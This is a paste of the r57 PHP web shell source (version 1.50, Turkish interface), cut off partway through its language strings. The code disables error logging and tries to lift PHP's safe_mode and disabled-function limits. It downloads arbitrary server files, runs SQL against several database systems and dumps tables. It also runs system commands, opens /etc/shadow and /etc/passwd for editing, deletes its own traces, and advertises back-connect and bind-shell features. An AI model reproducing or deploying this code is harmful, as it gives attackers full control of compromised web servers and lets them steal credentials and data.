· 5 years ago · Apr 15, 2020, 12:02 PM
1<?php error_reporting(0);
2 $language='tr';
3 $auth = 0;
4 @ini_restore("safe_mode");
5 @ini_restore("open_basedir");
6 @ini_restore("safe_mode_include_dir");
7 @ini_restore("safe_mode_exec_dir");
8 @ini_restore("disable_functions");
9 @ini_restore("allow_url_fopen");
10 @ini_set('error_log',NULL);
11 @ini_set('log_errors',0);
12 ;
13echo '';
14 if((!@function_exists('ini_get')) ||(@ini_get('open_basedir')!=NULL) ||(@ini_get('safe_mode_include_dir')!=NULL)){$open_basedir=1;
15}else{$open_basedir=0;
16};
17 define("starttime",@getmicrotime());
18 set_magic_quotes_runtime(0);
19 @set_time_limit(0);
20 @ini_set('max_execution_time',0);
21 @ini_set('output_buffering',0);
22 $safe_mode = @ini_get('safe_mode');
23 $version = '1.50<br/><br/><br/><br/>';
24 if(@version_compare(@phpversion(),'4.1.0') == -1) { $_POST = &$HTTP_POST_VARS;
25 $_GET = &$HTTP_GET_VARS;
26 $_SERVER = &$HTTP_SERVER_VARS;
27 $_COOKIE = &$HTTP_COOKIE_VARS;
28 } if (@get_magic_quotes_gpc()) { foreach ($_POST as $k=>$v) { $_POST[$k] = stripslashes($v);
29 } foreach ($_COOKIE as $k=>$v) { $_COOKIE[$k] = stripslashes($v);
30 } } if($auth == 1) { if (!isset($_SERVER['PHP_AUTH_USER']) ||md5($_SERVER['PHP_AUTH_USER'])!==$name ||md5($_SERVER['PHP_AUTH_PW'])!==$pass) { header('WWW-Authenticate: Basic realm=""');
31 header('HTTP/1.0 401 Unauthorized');
32 exit("<b>Access Denied</b>");
33 } } $head = '
34<html>
35<head>
36<meta http-equiv="Content-Type" content="text/html;
37 charset=windows-1251">
38<title>r57 Shell Version 1.50</title>
39<STYLE>
40tr {
41BORDER-RIGHT: black 1px solid;
42BORDER-TOP: black 1px solid;
43BORDER-LEFT: black 1px solid;
44BORDER-BOTTOM: black 1px solid;
45BORDER-COLOR: black;
46color: silver;
47}
48td {
49BORDER-RIGHT: black 1px solid;
50BORDER-TOP: black 1px solid;
51BORDER-LEFT: black 1px solid;
52BORDER-BOTTOM: black 1px solid;
53BORDER-COLOR: black;
54background-color:black;
55color: white;
56}
57.table1 {
58BORDER: 0px;
59BORDER-COLOR: #333333;
60BACKGROUND-COLOR: black;
61color: white;
62}
63.td1 {
64BORDER: 0px;
65BORDER-COLOR: #333333;
66font: 7pt Verdana;
67BACKGROUND-COLOR: black;
68color: green;
69}
70.tr1 {
71BORDER: 0px;
72BORDER-COLOR: #333333;
73color: #50AA20;
74}
75table {
76BORDER: #eeeeee 1px outset;
77BORDER-COLOR: #333333;
78BACKGROUND-COLOR: #131313;
79color: #50AA20;
80}
81input {
82border : solid 1px;
83border-color : #2D2D2D #252525 #252525 #252525;
84BACKGROUND-COLOR: black;
85font: 8pt Verdana;
86color: red;
87}
88select {
89BORDER-RIGHT: #ffffff 1px solid;
90BORDER-TOP: #999999 1px solid;
91BORDER-LEFT: #999999 1px solid;
92BORDER-BOTTOM: #ffffff 1px solid;
93BORDER-COLOR: #333333;
94BACKGROUND-COLOR: #131313;
95font: 8pt Verdana;
96color: white;
97;
98}
99submit {
100BORDER: buttonhighlight 2px outset;
101BACKGROUND-COLOR: #131313;
102width: 30%;
103color: white;
104}
105textarea {
106BORDER-RIGHT: #ffffff 1px solid;
107BORDER-TOP: #999999 1px solid;
108BORDER-LEFT: #999999 1px solid;
109BORDER-BOTTOM: #ffffff 1px solid;
110BORDER-COLOR: #333333;
111BACKGROUND-COLOR: black;
112font: Fixedsys bold;
113color: silver;
114}
115BODY {
116SCROLLBAR-ARROW-COLOR: #444444;
117SCROLLBAR-BASE-COLOR: #444444;
118margin: 1px;
119color: #50AA20;
120background-color: #131313;
121}
122.main {
123margin : -287px 0px 0px -490px;
124border : #000000 solid 1px;
125BORDER-COLOR: #333333;
126}
127.tt {
128background-color: black;
129}
130A:link {COLOR:red;
131 TEXT-DECORATION: none}
132A:visited { COLOR:red;
133 TEXT-DECORATION: none}
134A:active {COLOR:red;
135 TEXT-DECORATION: none}
136A:hover {color:blue;
137TEXT-DECORATION: none}
138</STYLE>
139<script language=\'javascript\'>
140function hide_div(id)
141{
142 document.getElementById(id).style.display = \'none\';
143 document.cookie=id+\'=0;
144\';
145}
146function show_div(id)
147{
148 document.getElementById(id).style.display = \'block\';
149 document.cookie=id+\'=1;
150\';
151}
152function change_divst(id)
153{
154 if (document.getElementById(id).style.display == \'none\')
155 show_div(id);
156 else
157 hide_div(id);
158}
159</script>';
160 class zipfile { var $datasec = array();
161 var $ctrl_dir = array();
162 var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
163 var $old_offset = 0;
164 function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ?getdate() : getdate($unixtime);
165 if ($timearray['year'] <1980) { $timearray['year'] = 1980;
166 $timearray['mon'] = 1;
167 $timearray['mday'] = 1;
168 $timearray['hours'] = 0;
169 $timearray['minutes'] = 0;
170 $timearray['seconds'] = 0;
171 } return (($timearray['year'] -1980) <<25) |($timearray['mon'] <<21) |($timearray['mday'] <<16) | ($timearray['hours'] <<11) |($timearray['minutes'] <<5) |($timearray['seconds'] >>1);
172 } function addFile($data,$name,$time = 0) { $name = str_replace('\\','/',$name);
173 $dtime = dechex($this->unix2DosTime($time));
174 $hexdtime = '\x'.$dtime[6] .$dtime[7] .'\x'.$dtime[4] .$dtime[5] .'\x'.$dtime[2] .$dtime[3] .'\x'.$dtime[0] .$dtime[1];
175 eval('$hexdtime = "'.$hexdtime .'";
176');
177 $fr = "\x50\x4b\x03\x04";
178 $fr .= "\x14\x00";
179 $fr .= "\x00\x00";
180 $fr .= "\x08\x00";
181 $fr .= $hexdtime;
182 $unc_len = strlen($data);
183 $crc = crc32($data);
184 $zdata = gzcompress($data);
185 $zdata = substr(substr($zdata,0,strlen($zdata) -4),2);
186 $c_len = strlen($zdata);
187 $fr .= pack('V',$crc);
188 $fr .= pack('V',$c_len);
189 $fr .= pack('V',$unc_len);
190 $fr .= pack('v',strlen($name));
191 $fr .= pack('v',0);
192 $fr .= $name;
193 $fr .= $zdata;
194 $this ->datasec[] = $fr;
195 $cdrec = "\x50\x4b\x01\x02";
196 $cdrec .= "\x00\x00";
197 $cdrec .= "\x14\x00";
198 $cdrec .= "\x00\x00";
199 $cdrec .= "\x08\x00";
200 $cdrec .= $hexdtime;
201 $cdrec .= pack('V',$crc);
202 $cdrec .= pack('V',$c_len);
203 $cdrec .= pack('V',$unc_len);
204 $cdrec .= pack('v',strlen($name) );
205 $cdrec .= pack('v',0 );
206 $cdrec .= pack('v',0 );
207 $cdrec .= pack('v',0 );
208 $cdrec .= pack('v',0 );
209 $cdrec .= pack('V',32 );
210 $cdrec .= pack('V',$this ->old_offset );
211 $this ->old_offset += strlen($fr);
212 $cdrec .= $name;
213 $this ->ctrl_dir[] = $cdrec;
214 } function file() { $data = implode('',$this ->datasec);
215 $ctrldir = implode('',$this ->ctrl_dir);
216 return $data . $ctrldir . $this ->eof_ctrl_dir . pack('v',sizeof($this ->ctrl_dir)) . pack('v',sizeof($this ->ctrl_dir)) . pack('V',strlen($ctrldir)) . pack('V',strlen($data)) . "\x00\x00";
217 } } function compress(&$filename,&$filedump,$compress) { global $content_encoding;
218 global $mime_type;
219 if ($compress == 'bzip'&&@function_exists('bzcompress')) { $filename .= '.bz2';
220 $mime_type = 'application/x-bzip2';
221 $filedump = bzcompress($filedump);
222 } else if ($compress == 'gzip'&&@function_exists('gzencode')) { $filename .= '.gz';
223 $content_encoding = 'x-gzip';
224 $mime_type = 'application/x-gzip';
225 $filedump = gzencode($filedump);
226 } else if ($compress == 'zip'&&@function_exists('gzcompress')) { $filename .= '.zip';
227 $mime_type = 'application/zip';
228 $zipfile = new zipfile();
229 $zipfile ->addFile($filedump,substr($filename,0,-4));
230 $filedump = $zipfile ->file();
231 } else { $mime_type = 'application/octet-stream';
232 } } function moreread($temp){ global $lang,$language;
233 $str='';
234 if(@function_exists('fopen')&&@function_exists('feof')&&@function_exists('fgets')&&@function_exists('fclose')){ $ffile = @fopen($temp,"r");
235 while(!@feof($ffile)){$str .= @fgets($ffile);
236} fclose($ffile);
237 }elseif(@function_exists('fopen')&&@function_exists('fread')&&@function_exists('fclose')&&@function_exists('filesize')){ $ffile = @fopen($temp,"r");
238 $str = @fread($ffile,@filesize($temp));
239 @fclose($ffile);
240 }elseif(@function_exists('file')){ $ffiles = @file ($temp);
241 foreach ($ffiles as $ffile) {$str .= $ffile;
242} }elseif(@function_exists('file_get_contents')){ $str = @file_get_contents($temp);
243 }elseif(@function_exists('readfile')){ $str = @readfile($temp);
244 }else{echo $lang[$language.'_text56'];
245} return $str;
246 } function readzlib($filename,$temp=''){ global $lang,$language;
247 $str='';
248 if(!$temp) {$temp=tempnam(@getcwd(),"copytemp");
249};
250 if(@copy("compress.zlib://".$filename,$temp)) { $str = moreread($temp);
251 }else echo $lang[$language.'_text119'];
252 @unlink($temp);
253 return $str;
254 } function mailattach($to,$from,$subj,$attach) { $headers = "From: $from\r\n";
255 $headers .= "MIME-Version: 1.0\r\n";
256 $headers .= "Content-Type: ".$attach['type'];
257 $headers .= ";
258 name=\"".$attach['name']."\"\r\n";
259 $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
260 $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
261 if(mail($to,$subj,"",$headers)) {return 1;
262} return 0;
263 } class my_sql { var $host = 'localhost';
264 var $port = '';
265 var $user = '';
266 var $pass = '';
267 var $base = '';
268 var $db = '';
269 var $connection;
270 var $res;
271 var $error;
272 var $rows;
273 var $columns;
274 var $num_rows;
275 var $num_fields;
276 var $dump;
277 function connect() { switch($this->db) { case 'MySQL': if(empty($this->port)) {$this->port = '3306';
278} if(!@function_exists('mysql_connect')) return 0;
279 $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
280 if(is_resource($this->connection)) return 1;
281 break;
282 case 'MSSQL': if(empty($this->port)) {$this->port = '1433';
283} if(!@function_exists('mssql_connect')) return 0;
284 $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
285 if($this->connection) return 1;
286 break;
287 case 'PostgreSQL': if(empty($this->port)) {$this->port = '5432';
288} $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
289 if(!@function_exists('pg_connect')) return 0;
290 $this->connection = @pg_connect($str);
291 if(is_resource($this->connection)) return 1;
292 break;
293 case 'Oracle': if(!@function_exists('ocilogon')) return 0;
294 $this->connection = @ocilogon($this->user,$this->pass,$this->base);
295 if(is_resource($this->connection)) return 1;
296 break;
297 } return 0;
298 } function select_db() { switch($this->db) { case 'MySQL': if(@mysql_select_db($this->base,$this->connection)) return 1;
299 break;
300 case 'MSSQL': if(@mssql_select_db($this->base,$this->connection)) return 1;
301 break;
302 case 'PostgreSQL': return 1;
303 break;
304 case 'Oracle': return 1;
305 break;
306 } return 0;
307 } function query($query) { $this->res=$this->error='';
308 switch($this->db) { case 'MySQL': if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection))) { $this->error = @mysql_error($this->connection);
309 return 0;
310 } else if(is_resource($this->res)) {return 1;
311} return 2;
312 break;
313 case 'MSSQL': if(false===($this->res=@mssql_query($query,$this->connection))) { $this->error = 'Query error';
314 return 0;
315 } else if(@mssql_num_rows($this->res) >0) {return 1;
316} return 2;
317 break;
318 case 'PostgreSQL': if(false===($this->res=@pg_query($this->connection,$query))) { $this->error = @pg_last_error($this->connection);
319 return 0;
320 } else if(@pg_num_rows($this->res) >0) {return 1;
321} return 2;
322 break;
323 case 'Oracle': if(false===($this->res=@ociparse($this->connection,$query))) { $this->error = 'Query parse error';
324 } else { if(@ociexecute($this->res)) { if(@ocirowcount($this->res) != 0) return 2;
325 return 1;
326 } $error = @ocierror();
327 $this->error=$error['message'];
328 } break;
329 } return 0;
330 } function get_result() { $this->rows=array();
331 $this->columns=array();
332 $this->num_rows=$this->num_fields=0;
333 switch($this->db) { case 'MySQL': $this->num_rows=@mysql_num_rows($this->res);
334 $this->num_fields=@mysql_num_fields($this->res);
335 while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
336 @mysql_free_result($this->res);
337 if($this->num_rows){$this->columns = @array_keys($this->rows[0]);
338return 1;
339} break;
340 case 'MSSQL': $this->num_rows=@mssql_num_rows($this->res);
341 $this->num_fields=@mssql_num_fields($this->res);
342 while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
343 @mssql_free_result($this->res);
344 if($this->num_rows){$this->columns = @array_keys($this->rows[0]);
345return 1;
346};
347 break;
348 case 'PostgreSQL': $this->num_rows=@pg_num_rows($this->res);
349 $this->num_fields=@pg_num_fields($this->res);
350 while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
351 @pg_free_result($this->res);
352 if($this->num_rows){$this->columns = @array_keys($this->rows[0]);
353return 1;
354} break;
355 case 'Oracle': $this->num_fields=@ocinumcols($this->res);
356 while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
357 @ocifreestatement($this->res);
358 if($this->num_rows){$this->columns = @array_keys($this->rows[0]);
359return 1;
360} break;
361 } return 0;
362 } function dump($table) { if(empty($table)) return 0;
363 $this->dump=array();
364 $this->dump[0] = '##';
365 $this->dump[1] = '## --------------------------------------- ';
366 $this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");
367 $this->dump[3] = '## Database: '.$this->base;
368 $this->dump[4] = '## Table: '.$table;
369 $this->dump[5] = '## --------------------------------------- ';
370 switch($this->db) { case 'MySQL': $this->dump[0] = '## MySQL dump';
371 if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
372 if(!$this->get_result()) return 0;
373 $this->dump[] = $this->rows[0]['Create Table'];
374 $this->dump[] = '## --------------------------------------- ';
375 if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
376 if(!$this->get_result()) return 0;
377 for($i=0;
378$i<$this->num_rows;
379$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);
380} $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `",$this->columns).'`) VALUES (\''.@implode("', '",$this->rows[$i]).'\');
381';
382 } break;
383 case 'MSSQL': $this->dump[0] = '## MSSQL dump';
384 if($this->query('SELECT * FROM '.$table)!=1) return 0;
385 if(!$this->get_result()) return 0;
386 for($i=0;
387$i<$this->num_rows;
388$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);
389} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');
390';
391 } break;
392 case 'PostgreSQL': $this->dump[0] = '## PostgreSQL dump';
393 if($this->query('SELECT * FROM '.$table)!=1) return 0;
394 if(!$this->get_result()) return 0;
395 for($i=0;
396$i<$this->num_rows;
397$i++) { foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);
398} $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ",$this->columns).') VALUES (\''.@implode("', '",$this->rows[$i]).'\');
399';
400 } break;
401 case 'Oracle': $this->dump[0] = '## ORACLE dump';
402 $this->dump[] = '## under construction';
403 break;
404 default: return 0;
405 break;
406 } return 1;
407 } function close() { switch($this->db) { case 'MySQL': @mysql_close($this->connection);
408 break;
409 case 'MSSQL': @mssql_close($this->connection);
410 break;
411 case 'PostgreSQL': @pg_close($this->connection);
412 break;
413 case 'Oracle': @oci_close($this->connection);
414 break;
415 } } function affected_rows() { switch($this->db) { case 'MySQL': return @mysql_affected_rows($this->res);
416 break;
417 case 'MSSQL': return @mssql_affected_rows($this->res);
418 break;
419 case 'PostgreSQL': return @pg_affected_rows($this->res);
420 break;
421 case 'Oracle': return @ocirowcount($this->res);
422 break;
423 default: return 0;
424 break;
425 } } } if(!empty($_POST['cmd']) &&$_POST['cmd']=="download_file"&&!empty($_POST['d_name'])) { if($file=@fopen($_POST['d_name'],"r")){$filedump = @fread($file,@filesize($_POST['d_name']));
426@fclose($file);
427} else if ($file=readzlib($_POST['d_name'])) {$filedump = $file;
428}else {err(1,$_POST['d_name']);
429$_POST['cmd']="";
430} if(isset($_POST['cmd'])) { @ob_clean();
431 $filename = @basename($_POST['d_name']);
432 $content_encoding=$mime_type='';
433 compress($filename,$filedump,$_POST['compress']);
434 if (!empty($content_encoding)) {header('Content-Encoding: '.$content_encoding);
435} header("Content-type: ".$mime_type);
436 header("Content-disposition: attachment;
437 filename=\"".$filename."\";
438");
439 echo $filedump;
440 exit();
441 } } if(isset($_GET['phpinfo'])) {echo @phpinfo();
442echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
443die();
444} if (!empty($_POST['cmd']) &&$_POST['cmd']=="db_query") { echo $head;
445 $sql = new my_sql();
446 $sql->db = $_POST['db'];
447 $sql->host = $_POST['db_server'];
448 $sql->port = $_POST['db_port'];
449 $sql->user = $_POST['mysql_l'];
450 $sql->pass = $_POST['mysql_p'];
451 $sql->base = $_POST['mysql_db'];
452 $querys = @explode(';
453',$_POST['db_query']);
454 echo '<body bgcolor=#000000>';
455 if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
456 else { if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
457 else { foreach($querys as $num=>$query) { if(strlen($query)>5) { echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
458 switch($sql->query($query)) { case '0': echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
459 break;
460 case '1': if($sql->get_result()) { echo "<table width=100%>";
461 foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
462 $keys = @implode("
463</b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b>
464",$sql->columns);
465 echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b>
466".$keys."
467</b></font></td></tr>";
468 for($i=0;
469$i<$sql->num_rows;
470$i++) { foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
471 $values = @implode("
472</font></td><td><font face=Verdana size=-2>
473",$sql->rows[$i]);
474 echo '<tr><td><font face=Verdana size=-2>
475'.$values.'
476</font></td></tr>';
477 } echo "</table>";
478 } break;
479 case '2': $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
480 echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
481 break;
482 } } } } } echo "<br><form name=form method=POST>";
483 echo in('hidden','db',0,$_POST['db']);
484 echo in('hidden','db_server',0,$_POST['db_server']);
485 echo in('hidden','db_port',0,$_POST['db_port']);
486 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
487 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
488 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
489 echo in('hidden','cmd',0,'db_query');
490 echo "<div align=center>";
491 echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
492 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;
493\nSELECT * FROM user;
494"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
495 echo "</form>";
496 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
497die();
498 } if(isset($_GET['delete'])) { @unlink(__FILE__);
499 } if(isset($_GET['tmp'])) { @unlink("/tmp/bdpl");
500 @unlink("/tmp/back");
501 @unlink("/tmp/bd");
502 @unlink("/tmp/bd.c");
503 @unlink("/tmp/dp");
504 @unlink("/tmp/dpc");
505 @unlink("/tmp/dpc.c");
506 @unlink("/tmp/prxpl");
507 @unlink("/tmp/grep.txt");
508 } if(isset($_GET['phpini'])) { echo $head;
509 function U_value($value) { if ($value == '') return '<i>no value</i>';
510 if (@is_bool($value)) return $value ?'TRUE': 'FALSE';
511 if ($value === null) return 'NULL';
512 if (@is_object($value)) $value = (array) $value;
513 if (@is_array($value)) { @ob_start();
514 print_r($value);
515 $value = @ob_get_contents();
516 @ob_end_clean();
517 } return U_wordwrap((string) $value);
518 } function U_wordwrap($str) { $str = @wordwrap(@htmlspecialchars($str),100,'<wbr />',true);
519 return @preg_replace('!(&[^;
520]*)<wbr />([^;
521]*;
522)!','$1$2<wbr />',$str);
523 } if (@function_exists('ini_get_all')) { $r = '';
524 echo '<table width=100%>','<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
525 foreach (@ini_get_all() as $key=>$value) { $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
526 } echo $r;
527 echo '</table>';
528 } echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
529 die();
530 } if(isset($_GET['cpu'])) { echo $head;
531 echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
532 $cpuf = @file("cpuinfo");
533 if($cpuf) { $c = @sizeof($cpuf);
534 for($i=0;
535$i<$c;
536$i++) { $info = @explode(":",$cpuf[$i]);
537 if($info[1]==""){$info[1]="---";
538} $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
539 } echo $r;
540 } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
541 } echo '</table>';
542 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
543 die();
544 } if(isset($_GET['mem'])) { echo $head;
545 echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
546 $memf = @file("meminfo");
547 if($memf) { $c = sizeof($memf);
548 for($i=0;
549$i<$c;
550$i++) { $info = explode(":",$memf[$i]);
551 if($info[1]==""){$info[1]="---";
552} $r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
553 } echo $r;
554 } else { echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
555 } echo '</table>';
556 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">green</a> ]</b></font></div>";
557 die();
558 } if(isset($_GET['dmesg(8)'])) {$_POST['cmd'] = 'dmesg(8)';
559} if(isset($_GET['free'])) {$_POST['cmd'] = 'free';
560} if(isset($_GET['vmstat'])) {$_POST['cmd'] = 'vmstat';
561} if(isset($_GET['lspci'])) {$_POST['cmd'] = 'lspci';
562} if(isset($_GET['lsdev'])) {$_POST['cmd'] = 'lsdev';
563} if(isset($_GET['procinfo'])) {$_POST['cmd']='cat /proc/cpuinfo';
564} if(isset($_GET['version'])) {$_POST['cmd']='cat /proc/version';
565} if(isset($_GET['interrupts'])) {$_POST['cmd']='cat /proc/interrupts';
566} if(isset($_GET['realise1'])) {$_POST['cmd'] = 'cat /etc/*realise';
567} if(isset($_GET['service'])) {$_POST['cmd'] = 'service --status-all';
568} if(isset($_GET['ifconfig'])) {$_POST['cmd'] = 'ifconfig';
569} if(isset($_GET['w'])) {$_POST['cmd'] = 'w';
570} if(isset($_GET['who'])) {$_POST['cmd'] = 'who';
571} if(isset($_GET['uptime'])) {$_POST['cmd'] = 'uptime';
572} if(isset($_GET['last'])) {$_POST['cmd'] = 'last -n 10';
573} if(isset($_GET['psaux'])) {$_POST['cmd'] = 'ps -aux';
574} if(isset($_GET['netstat'])) {$_POST['cmd'] = 'netstat -a';
575} if(isset($_GET['lsattr'])) {$_POST['cmd'] = 'lsattr -va';
576} if(isset($_GET['syslog'])) {$_POST['cmd']='edit_file';
577$_POST['e_name'] = '/etc/syslog.conf';
578} if(isset($_GET['fstab'])) {$_POST['cmd']='edit_file';
579$_POST['e_name'] = '/etc/fstab';
580} if(isset($_GET['fdisk'])) {$_POST['cmd'] = 'fdisk -l';
581} if(isset($_GET['df'])) {$_POST['cmd'] = 'df -h';
582} if(isset($_GET['realise2'])) {$_POST['cmd']='edit_file';
583$_POST['e_name'] = '/etc/issue.net';
584} if(isset($_GET['hosts'])) {$_POST['cmd']='edit_file';
585$_POST['e_name'] = '/etc/hosts';
586} if(isset($_GET['resolv'])) {$_POST['cmd']='edit_file';
587$_POST['e_name'] = '/etc/resolv.conf';
588} if(isset($_GET['systeminfo'])) {$_POST['cmd'] = 'systeminfo';
589} if(isset($_GET['shadow'])) {$_POST['cmd']='edit_file';
590$_POST['e_name'] = '/etc/shadow';
591} if(isset($_GET['passwd'])) {$_POST['cmd']='edit_file';
592$_POST['e_name'] = '/etc/passwd';
593} $lang=array( 'tr_text1'=>'Komut Uygula', 'tr_text2'=>'Server uzerinde komut calistir ', 'tr_text3'=>'Komut istemi ', 'tr_text4'=>'Calisma Dizini ', 'tr_text5'=>'Servere Dosya Upload Et', 'tr_text6'=>'Yerel Dosya ', 'tr_text7'=>'Dizin Veya Dosya Bul ', 'tr_text8'=>'Sec', 'tr_butt1'=>'Uygula', 'tr_butt2'=>'Yukle', 'tr_text9'=>'Porta baglan /bin/bash', 'tr_text10'=>'Port', 'tr_text11'=>'Sifre Giris', 'tr_butt3'=>'Baglan', 'tr_text12'=>'Back-Connect', 'tr_text13'=>'IP', 'tr_text14'=>'Port', 'tr_butt4'=>'Baglan', 'tr_text15'=>'Uzaktan servere dosya yukle', 'tr_text16'=>'ile', 'tr_text17'=>'Uzak Dosya', 'tr_text18'=>'Yerel Dosya', 'tr_text19'=>'Exploits', 'tr_text20'=>'Kullan', 'tr_text21'=>'
594Yeni ad', 'tr_text22'=>'datapipe', 'tr_text23'=>'Yerel Port', 'tr_text24'=>'Uzak Host', 'tr_text25'=>'Uzak Port', 'tr_text26'=>'Kullan', 'tr_butt5'=>'Iste', 'tr_text28'=>'Guvenlik Modunda Calis', 'tr_text29'=>'Giris Yok ', 'tr_butt6'=>'Degistir', 'tr_text30'=>'Cat file', 'tr_butt7'=>'Goster', 'tr_text31'=>'Dosya Bulunamadi', 'tr_text32'=>'PHP Kod Degerlendir ', 'tr_text33'=>'Test bypass open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)', 'tr_butt8'=>'Testet', 'tr_text34'=>'Includes fonksiyonu ile Guvenlik modunu atlamayi test et.', 'tr_text35'=>'Mysql da ki yukleme dosyasi ile Guvenlik modunu atlamayi test et.', 'tr_text36'=>'Database[VeriTabani]', 'tr_text37'=>'Kullanici', 'tr_text38'=>'Sifre', 'tr_text39'=>'Tablo', 'tr_text40'=>'Dump database table[DB Tablosu dok]', 'tr_butt9'=>'Dump', 'tr_text41'=>'DB dosyalarini kaydet.[Dump filed]', 'tr_text42'=>'Dosya Duzenle ', 'tr_text43'=>'Dosya Duzenlemek icin', 'tr_butt10'=>'Kaydet', 'tr_text44'=>'Dosya degistirilmiyor ! YASAK ! Guvenlik Modu izin Vermiyor', 'tr_text45'=>'Dosya Kaydedildi', 'tr_text46'=>'PHP info Goster()', 'tr_text47'=>'Php.ini dosyasinda ki degiskenleri goster', 'tr_text48'=>'Temp dosylarini sil', 'tr_butt11'=>'Dosya Duzenle', 'tr_text49'=>'Server dan bu scripti sil', 'tr_text50'=>'CPU bilgisini incele', 'tr_text51'=>'Memory[hafiza] bilgisini incele]', 'tr_text52'=>'Metni Bul ', 'tr_text53'=>'Klasor Bul', 'tr_text54'=>'Dosyalarda ki Metni Bul', 'tr_butt12'=>'Bul', 'tr_text55'=>'Dosya Bul ', 'tr_text56'=>'Bulunmadi :( KeyCoder :)', 'tr_text57'=>'Olustur/Sil Dosya/Dizin ', 'tr_text58'=>'isim', 'tr_text59'=>'Dosya', 'tr_text60'=>'Dizin', 'tr_butt13'=>'Olustur/Sil', 'tr_text61'=>'Dosya Olustur', 'tr_text62'=>'Dizin Olustur', 'tr_text63'=>'Dosya Sil', 'tr_text64'=>'Dizin Sil', 'tr_text65'=>'Olustur', 'tr_text66'=>'Sil', 'tr_text67'=>'Chown/Chgrp/Chmod', 'tr_text68'=>'Uygula', 'tr_text69'=>'param1', 'tr_text70'=>'param2', 'tr_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", 'tr_text72'=>'Metin Bul', 'tr_text73'=>'Klasor Bul', 'tr_text74'=>'Dosya Bul', 'tr_text75'=>'* you can use regexp', 'tr_text76'=>'Metin Ara Dosyalarin icinde Arama Yoluyla', 